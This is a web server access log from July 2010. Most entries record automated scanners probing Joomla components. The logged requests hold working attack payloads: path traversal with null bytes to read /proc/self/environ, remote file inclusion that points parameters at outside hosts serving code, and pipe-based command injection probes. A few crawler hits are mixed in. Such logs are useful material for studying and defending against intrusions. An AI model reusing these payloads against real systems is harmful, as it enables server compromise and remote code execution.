89.200.169.163 - - [26/Jul/2010:12:50:18 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
64.34.172.171 - - [26/Jul/2010:12:50:48 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:12:50:48 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
188.127.248.175 - - [26/Jul/2010:12:56:15 +0200] "GET /logs/access_log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:12:56:15 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:12:56:15 +0200] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:12:56:16 +0200] "GET /logs/access_log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:12:56:16 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:12:56:17 +0200] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
114.108.151.149 - - [26/Jul/2010:13:16:11 +0200] "GET /logs/access_log//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:13:16:12 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:13:16:13 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
114.108.176.9 - - [26/Jul/2010:13:23:07 +0200] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.saluteinerba.com/data/pid?? HTTP/1.1" 404 330 "-" "Mozilla/5.0"
114.108.176.9 - - [26/Jul/2010:13:23:07 +0200] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.saluteinerba.com/data/pid?? HTTP/1.1" 404 335 "-" "Mozilla/5.0"
207.46.13.142 - - [26/Jul/2010:13:30:36 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.142 - - [26/Jul/2010:13:35:29 +0200] "GET / HTTP/1.1" 200 559 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.202.2.34 - - [26/Jul/2010:13:37:59 +0200] "GET /index.php?option=com_ninjarsssyndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 295 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:37:59 +0200] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 300 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:37:59 +0200] "GET /logs/access_log%20%20/index.php?option=com_ninjarsssyndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:38:00 +0200] "GET /index.php?option=com_ninjarsssyndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 295 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:38:00 +0200] "GET /logs/access_log%20%20/index.php?option=com_ninjarsssyndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:38:00 +0200] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 300 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:45:37 +0200] "GET /index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 295 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:45:37 +0200] "GET /logs/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 300 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:45:37 +0200] "GET /logs/access_log%20%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:45:38 +0200] "GET /logs/index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 300 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:45:38 +0200] "GET /index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 295 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:45:38 +0200] "GET /logs/access_log%20%20/index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
173.212.242.11 - - [26/Jul/2010:13:50:39 +0200] "GET //?_PHPLIB[libdir]=http://www.loskalakis.com/fx29id1.txt?? HTTP/1.1" 200 665 "-" "Mozilla/5.0"
173.212.242.11 - - [26/Jul/2010:13:50:39 +0200] "GET /logs//?_PHPLIB[libdir]=http://www.loskalakis.com/fx29id1.txt?? HTTP/1.1" 200 801 "-" "Mozilla/5.0"
173.212.242.11 - - [26/Jul/2010:13:50:39 +0200] "GET /logs/access_log%20%20//?_PHPLIB[libdir]=http://www.loskalakis.com/fx29id1.txt?? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
92.43.201.28 - - [26/Jul/2010:13:52:02 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:13:52:02 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:13:52:16 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:13:52:16 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:13:52:17 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:13:52:17 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
83.149.110.213 - - [26/Jul/2010:13:52:17 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:13:52:17 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:13:52:18 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:13:52:18 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:13:52:18 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:13:52:18 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:13:52:19 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:13:52:19 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
92.43.201.28 - - [26/Jul/2010:13:52:27 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:13:52:28 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:13:53:16 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:13:53:16 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:13:53:48 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:13:53:48 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
83.149.110.213 - - [26/Jul/2010:13:55:00 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:13:55:00 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:13:55:08 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:13:55:08 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:13:55:11 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:13:55:11 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:13:55:14 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:13:55:15 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
92.43.201.28 - - [26/Jul/2010:13:56:15 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:13:56:15 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:13:57:00 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:13:57:01 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:13:57:12 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:13:57:12 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:13:57:59 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:13:57:59 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:13:58:11 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:13:58:23 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
83.149.110.213 - - [26/Jul/2010:14:00:37 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:14:00:38 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:14:00:38 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:14:00:38 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:14:00:38 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:14:00:42 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
92.43.201.28 - - [26/Jul/2010:14:00:58 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:14:00:58 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
83.149.110.213 - - [26/Jul/2010:14:01:00 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:14:01:00 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:14:01:11 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:14:01:11 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
92.43.201.28 - - [26/Jul/2010:14:01:47 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:14:01:48 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:14:03:37 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:14:03:37 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
76.242.100.234 - - [26/Jul/2010:14:04:22 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
92.43.201.28 - - [26/Jul/2010:14:04:23 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:14:04:23 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
76.242.100.234 - - [26/Jul/2010:14:04:27 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
92.43.201.28 - - [26/Jul/2010:14:05:21 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:14:05:31 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
76.242.100.234 - - [26/Jul/2010:14:08:13 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:14:08:17 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:14:08:17 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:14:10:45 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:14:10:51 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
174.142.75.205 - - [26/Jul/2010:14:15:12 +0200] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 336 "-" "libwww-perl/5.805"
174.142.75.205 - - [26/Jul/2010:14:15:17 +0200] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 331 "-" "libwww-perl/5.805"
207.46.204.192 - - [26/Jul/2010:14:41:44 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
188.127.248.175 - - [26/Jul/2010:14:47:38 +0200] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
92.43.201.28 - - [26/Jul/2010:14:50:16 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:14:50:16 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:14:50:17 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:14:50:17 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
